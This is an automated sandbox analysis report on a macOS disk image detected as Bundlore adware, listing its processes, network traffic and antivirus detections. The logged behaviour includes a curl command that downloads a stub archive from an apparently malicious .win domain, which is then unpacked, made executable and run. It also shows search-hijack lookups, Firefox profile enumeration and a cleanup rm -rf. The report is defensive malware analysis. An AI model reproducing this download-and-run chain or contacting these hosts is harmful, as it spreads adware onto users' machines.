Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:22.0.0
Analysis ID:53411
Start time:09:18:53
Joe Sandbox Product:Cloud
Start date:11.05.2018
Overall analysis duration:0h 6m 20s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:kkoVCFZzgV (renamed file extension from none to dmg)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal76.macDMG@0/23@4/0

Detection

StrategyScoreRangeReportingDetection
Threshold760 - 100Report FP / FNmalicious

Classification

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macosAvira: Label: ADWARE/OSX.Bundlore.amdgw
Antivirus detection for submitted fileShow sources
Source: kkoVCFZzgV.dmgAvira: Label: ADWARE/OSX.Bundlore.gixtg

Cryptography:

barindex
Executes the "openssl" command used for cryptographic operationsShow sources
Source: /bin/bash (PID: 821)Openssl executable: /usr/bin/openssl -> openssl base64 -d -AJump to behavior
Source: /bin/bash (PID: 822)Openssl executable: /usr/bin/openssl -> openssl base64 -d -AJump to behavior
Source: /bin/bash (PID: 826)Openssl executable: /usr/bin/openssl -> openssl base64 -d -AJump to behavior
Source: /bin/bash (PID: 827)Openssl executable: /usr/bin/openssl -> openssl base64 -d -AJump to behavior

Networking:

barindex
Downloads compressed data via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.6.3Content-Type: application/octet-streamContent-Length: 283326Last-Modified: Wed, 04 Apr 2018 15:30:28 GMTETag: "5ac4ef94-452be"Accept-Ranges: bytesDate: Fri, 11 May 2018 07:20:04 GMTConnection: keep-aliveX-N: SData Raw: 1f 8b 08 00 65 ef c4 5a 00 03 ec 7d 09 7c 13 45 fb f0 ce ec 91 a4 d9 2d db 72 9f 4d af f4 6e d3 f4 3e 38 4a cb 51 8e d2 93 1b 4a da a6 6d 68 9b 94 24 e5 46 76 40 41 05 91 5b 0e 95 5b 4e 41 41 10 e4 10 11 05 11 91 1b 44 40 50 11 50 44 14 14 05 94 6f 66 93 a6 07 a5 fa fe df ff ef fd 7e df ef 7b b3 a4 99 dd 99 79 9e 67 e6 b9 9f dd 84 f0 88 8a 8a 30 93 d9 66 37 94 97 87 55 18 0a 2d b6 70 43 65 65 04 f5 bf f9 d2 e9 74 71 31 31 1a f9 33 d6 f1 a9 d3 47 3b 3e 9d 2f 4d 64 94 3e 36 32 32 36 2e 46 17 a9 d1 45 c6 c4 c5 c4 52 9a 98 ff 55 2a 9e f2 aa c2 4b b7 62 52 0c a3 4d a3 0d 26 db 53 c7 e1 61 c5 c5 8d c0 71 ae c3 f5 f9 ff c8 2b bc 61 fe a7 5a cc 76 a3 d9 6e fb 5f 11 84 7f c6 ff c8 e8 38 7d 74 5c 9c 3e 0a f3 1f b3 3f ea bf fc ff 4f bc fe 8e ff f9 a9 96
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /sdl/mmStub.tar.gz?ts=1526030402 HTTP/1.1Host: qylhi.comedyohio.winUser-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /Mac/getInstallerSpecs/?&channel=b4500&info=&newInstallerVM=true&vm= HTTP/1.1Host: service.macinstallerinfo.comAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /download/Mac/InstallerResources/eula_mymediadownloader.txt HTTP/1.1Host: cdn.macresourcescdn.comAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /download/Mac/InstallerResources/header01.jpg HTTP/1.1Host: cdn.macresourcescdn.comAccept: */*Cookie: __cfduid=d5e13ab547ef9c0adb671d1395c24fded1526023211User-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /download/Mac/InstallerResources/MediaDownloader-Logo.png HTTP/1.1Host: cdn.macresourcescdn.comAccept: */*Cookie: __cfduid=d5e13ab547ef9c0adb671d1395c24fded1526023211User-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /tracking/cm_mac.php?clickid=0&funnel=generateScreen-0 HTTP/1.1Host: service.macinstallerinfo.comAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /?click_id=0&event=generateScreen-0 HTTP/1.1Host: events.ponystudent.winAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: mm-install-macos/4500 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: qylhi.comedyohio.win
Urls found in memory or binary dataShow sources
Source: kkoVCFZzgV.dmgString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd

Persistence and Installation Behavior:

barindex
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/bash (PID: 828)Rm executable: /bin/rm -> rm -rf /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmpJump to behavior
Many shell processes execute programs via execve syscall (may be indicative for malicious behavior)Show sources
Source: /bin/sh (PID: 835)Shell process: ps -wwo args 818Jump to behavior
Source: /bin/sh (PID: 836)Shell process: tail -1Jump to behavior
Source: /bin/sh (PID: 837)Shell process: sed -nE s/(\/bin\/bash[ ]?)([^ ]+).*/\2/pJump to behavior
Source: /bin/sh (PID: 839)Shell process: defaults find hspart=iryJump to behavior
Source: /bin/sh (PID: 840)Shell process: defaults find v=insMacJump to behavior
Source: /bin/sh (PID: 841)Shell process: defaults find bndlJump to behavior
Source: /bin/sh (PID: 842)Shell process: defaults find chumsearchJump to behavior
Source: /bin/sh (PID: 843)Shell process: defaults find SearchQuickJump to behavior
Source: /bin/sh (PID: 845)Shell process: ls /Users/henry/Library/Application Support/Firefox/Profiles/Jump to behavior
Source: /bin/sh (PID: 846)Shell process: sort -nJump to behavior
Source: /bin/sh (PID: 847)Shell process: head -n 1Jump to behavior
Source: /bin/sh (PID: 848)Shell process: defaults find search-quickJump to behavior
Source: /bin/sh (PID: 850)Shell process: ls /Users/henry/Library/Application Support/Firefox/Profiles/Jump to behavior
Source: /bin/sh (PID: 851)Shell process: sort -nJump to behavior
Source: /bin/sh (PID: 852)Shell process: head -n 1Jump to behavior
Source: /bin/sh (PID: 853)Shell process: defaults find racksearchJump to behavior
Source: /bin/sh (PID: 854)Shell process: defaults find linkeysearchJump to behavior
Queries for attached disk images with shell command 'hdiutil'Show sources
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Hdiutil command executed: /usr/bin/hdiutil info -plistJump to behavior
Creates application bundlesShow sources
Source: /usr/bin/tar (PID: 831)Bundle Info.plist file created: mm-install-macos.app/Contents/Info.plistJump to behavior
Creates code signed application bundlesShow sources
Source: /usr/bin/tar (PID: 831)Bundle code signature resource file created: mm-install-macos.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Creates hidden files, links and/or directoriesShow sources
Source: /usr/bin/tar (PID: 831)Hidden file created: mm-install-macos.app/Contents/._Info.plist.388mtAJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Shell command executed: /bin/sh -c ps -wwo args 818 | tail -1 | sed -nE 's/(\/bin\/bash[ ]?)([^ ]+).*/\2/p'Jump to behavior
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Shell command executed: sh -c defaults find hspart=iryJump to behavior
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Shell command executed: sh -c defaults find v=insMacJump to behavior
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Shell command executed: sh -c defaults find bndlJump to behavior
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Shell command executed: sh -c defaults find chumsearchJump to behavior
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Shell command executed: sh -c defaults find SearchQuickJump to behavior
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Shell command executed: sh -c ls '/Users/henry/Library/Application Support/Firefox/Profiles/' | sort -n | head -n 1Jump to behavior
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Shell command executed: sh -c defaults find search-quickJump to behavior
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Shell command executed: sh -c defaults find racksearchJump to behavior
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Shell command executed: sh -c defaults find linkeysearchJump to behavior
Executes the "chmod" command used to modify permissionsShow sources
Source: /bin/bash (PID: 832)Chmod executable: /bin/chmod -> chmod +x /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macosJump to behavior
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)Show sources
Source: /bin/bash (PID: 830)Curl executable: /usr/bin/curl -> curl -s -L -o /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/stmp.tar.gz http://qylhi.comedyohio.win/sdl/mmStub.tar.gz?ts=1526030402Jump to behavior
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/bash (PID: 829)Mkdir executable: /bin/mkdir -> mkdir -p /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmpJump to behavior
Executes the "ps" command used to list the status of processesShow sources
Source: /bin/sh (PID: 835)Ps executable: /bin/ps -> ps -wwo args 818Jump to behavior
Reads launchservices plist filesShow sources
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)Show sources
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
Writes 64-bit Mach-O files to diskShow sources
Source: /usr/bin/tar (PID: 831)File written: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macosJump to dropped file
Writes icon files to diskShow sources
Source: /usr/bin/tar (PID: 831)File written: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Resources/locked.icnsJump to dropped file
Source: /usr/bin/tar (PID: 831)File written: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Resources/mm-install-macos.icnsJump to dropped file
Creates application bundles containing icon filesShow sources
Source: /usr/bin/tar (PID: 831)Icon file created: mm-install-macos.app/Contents/Resources/locked.icnsJump to behavior
Source: /usr/bin/tar (PID: 831)Icon file created: mm-install-macos.app/Contents/Resources/mm-install-macos.icnsJump to behavior
Executes the "sed" command used to modify input streams (typically from files or pipes)Show sources
Source: /bin/sh (PID: 837)Sed executable: /usr/bin/sed -> sed -nE s/(\/bin\/bash[ ]?)([^ ]+).*/\2/pJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /usr/bin/tar (PID: 831)XML plist file created: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Info.plistJump to dropped file
Source: /usr/bin/tar (PID: 831)Binary plist file created: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Resources/MainWindow.nibJump to dropped file
Source: /usr/bin/tar (PID: 831)Binary plist file created: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Resources/__TBT_Template_Base.nibJump to dropped file
Source: /usr/bin/tar (PID: 831)Binary plist file created: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/Resources/__TBT_RequestForm.nibJump to dropped file
Source: /usr/bin/tar (PID: 831)XML plist file created: /private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/_CodeSignature/CodeResourcesJump to dropped file

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal76.macDMG@0/23@4/0

HIPS / PFW / Operating System Protection Evasion:

barindex
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Sysctl read request: kern.safeboot (1.66)Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Executes the "defaults" command used to read or modify user specific settingsShow sources
Source: /bin/sh (PID: 839)Defaults executable: /usr/bin/defaults -> defaults find hspart=iryJump to behavior
Source: /bin/sh (PID: 840)Defaults executable: /usr/bin/defaults -> defaults find v=insMacJump to behavior
Source: /bin/sh (PID: 841)Defaults executable: /usr/bin/defaults -> defaults find bndlJump to behavior
Source: /bin/sh (PID: 842)Defaults executable: /usr/bin/defaults -> defaults find chumsearchJump to behavior
Source: /bin/sh (PID: 843)Defaults executable: /usr/bin/defaults -> defaults find SearchQuickJump to behavior
Source: /bin/sh (PID: 848)Defaults executable: /usr/bin/defaults -> defaults find search-quickJump to behavior
Source: /bin/sh (PID: 853)Defaults executable: /usr/bin/defaults -> defaults find racksearchJump to behavior
Source: /bin/sh (PID: 854)Defaults executable: /usr/bin/defaults -> defaults find linkeysearchJump to behavior

Language, Device and Operating System Detection:

barindex
Reads process information of other processesShow sources
Source: /bin/ps (PID: 835)Sysctl requested: kern.proc.pid (1.14.1) only found for 1.14.1.818 -> queries PID 818Jump to behavior
Source: /bin/ps (PID: 835)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.818 -> queries PID 818Jump to behavior
Reads hardware related sysctl valuesShow sources
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Sysctl read request: hw.availcpu (6.25)Jump to behavior
Reads the systems OS release and/or typeShow sources
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Reads the systems hostnameShow sources
Source: /Users/henry/Desktop/unpack/Install/Install.app/Contents/MacOS/Install (PID: 818)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 834)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 839)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 840)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 841)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 842)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 843)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 844)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 848)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 849)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 853)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 854)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T//mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos (PID: 833)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior


Runtime Messages

Command:open "/Users/henry/Desktop/unpack/Install/Install.app"
Exitcode:0
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 53411 Sample: kkoVCFZzgV Startdate: 11/05/2018 Architecture: MAC Score: 76 59 qylhi.comedyohio.win 195.176.255.152, 49272, 80 SWITCHPeeringrequests_peeringswitchch_CH Switzerland 2->59 61 service.macinstallerinfo.com 104.239.223.14, 49273, 80 RACKSPACE-RackspaceHostingUS United States 2->61 63 2 other IPs or domains 2->63 65 Antivirus detection for dropped file 2->65 67 Antivirus detection for submitted file 2->67 9 xpcproxy Install 2->9         started        signatures3 process4 process5 11 bash mm-install-macos 9->11         started        14 bash rm 9->14         started        16 bash tar 10 9->16         started        19 6 other processes 9->19 file6 77 Queries for attached disk images with shell command 'hdiutil' 11->77 21 sh 11->21         started        23 sh 11->23         started        25 sh 11->25         started        33 9 other processes 11->33 79 Executes the "rm" command used to delete files or directories 14->79 57 /private/var/folde...OS/mm-install-macos, Mach-O 16->57 dropped 27 bash openssl 19->27         started        29 bash openssl 19->29         started        31 bash openssl 19->31         started        36 3 other processes 19->36 signatures7 process8 signatures9 38 sh ps 21->38         started        41 sh tail 21->41         started        43 sh sed 21->43         started        45 sh ls 23->45         started        47 sh sort 23->47         started        49 sh head 23->49         started        51 sh ls 25->51         started        53 sh sort 25->53         started        55 sh head 25->55         started        73 Many shell processes execute programs via execve syscall (may be indicative for malicious behavior) 33->73 75 Executes the "defaults" command used to read or modify user specific settings 33->75 process10 signatures11 69 Many shell processes execute programs via execve syscall (may be indicative for malicious behavior) 38->69 71 Reads process information of other processes 38->71

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
kkoVCFZzgV.dmg100%AviraADWARE/OSX.Bundlore.gixtg

Dropped Files

SourceDetectionScannerLabelLink
/private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/T/mmstmp/mm-install-macos.app/Contents/MacOS/mm-install-macos100%AviraADWARE/OSX.Bundlore.amdgw

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

Screenshots